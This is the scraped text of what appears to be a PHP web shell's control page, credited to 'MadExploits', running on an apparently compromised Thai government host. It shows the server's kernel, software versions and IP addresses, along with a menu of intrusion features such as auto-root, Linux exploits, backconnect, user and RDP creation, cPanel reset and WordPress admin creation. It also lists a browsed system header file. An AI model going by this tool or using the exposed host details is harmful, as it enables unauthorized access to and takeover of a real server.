Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
mtd /
[ HOME SHELL ]
Name
Size
Permission
Action
inftl-user.h
1.54
KB
-rw-r--r--
mtd-abi.h
4.46
KB
-rw-r--r--
mtd-user.h
456
B
-rw-r--r--
nftl-user.h
1.29
KB
-rw-r--r--
ubi-user.h
15.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mtd-user.h
/* * MTD ABI header for use by user space only. */ #ifndef __MTD_USER_H__ #define __MTD_USER_H__ #include <stdint.h> /* This file is blessed for inclusion by userspace */ #include <mtd/mtd-abi.h> typedef struct mtd_info_user mtd_info_t; typedef struct erase_info_user erase_info_t; typedef struct region_info_user region_info_t; typedef struct nand_oobinfo nand_oobinfo_t; typedef struct nand_ecclayout nand_ecclayout_t; #endif /* __MTD_USER_H__ */
Close